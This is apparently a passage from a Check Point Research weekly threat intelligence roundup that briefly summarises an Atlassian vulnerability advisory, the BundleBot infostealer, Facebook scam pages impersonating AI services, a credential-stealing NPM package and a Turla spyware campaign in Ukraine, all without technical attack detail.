• Atlassian has released a security advisory addressing 3 high severity remote code execution vulnerabilities. Two of the vulnerabilities affect Confluence DC&S, and the third affects Bamboo.

THREAT INTELLIGENCE REPORTS

• Check Point Research has analyzed BundleBot, a new infostealer which is being spread via malicious Facebook ads and compromised accounts. The malware abuses the dotnet bundle (single-file), self-contained format, which results in a single, large binary file that is difficult to detect by security tools.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (InfoStealer.Win.FakeGoogleAI, InfoStealer.Wins.BYOSDownloader)

• Check Point Research has discovered multiple Facebook scam pages with hundreds of thousands of followers, impersonating popular generative AI services. After an infection chain of several steps, the victims are tricked to downloaded an info stealer that exfiltrates their online passwords, crypto wallets and any information saved in their browser
• Check Point researchers have identified a malicious Node Package Manager (NPM) package that is still being delivered to users even after being removed from the NPM registry. The package, which aimed to harvest victims’ credentials, was still being delivered to users via the popular CDN ‘jsdelivr’.
• The Ukrainian CERT has discovered an ongoing spyware campaign targeting the country’s defense forces. The agency has attributed the campaign to Turla, a threat actor known to be affiliated with the Russian FSB. The initial infection vector used in the campaign was spear-phishing emails containing malicious attachments, which would eventually deliver backdoor payloads.

The post 24th July – Threat Intelligence Report appeared first on Check Point Research.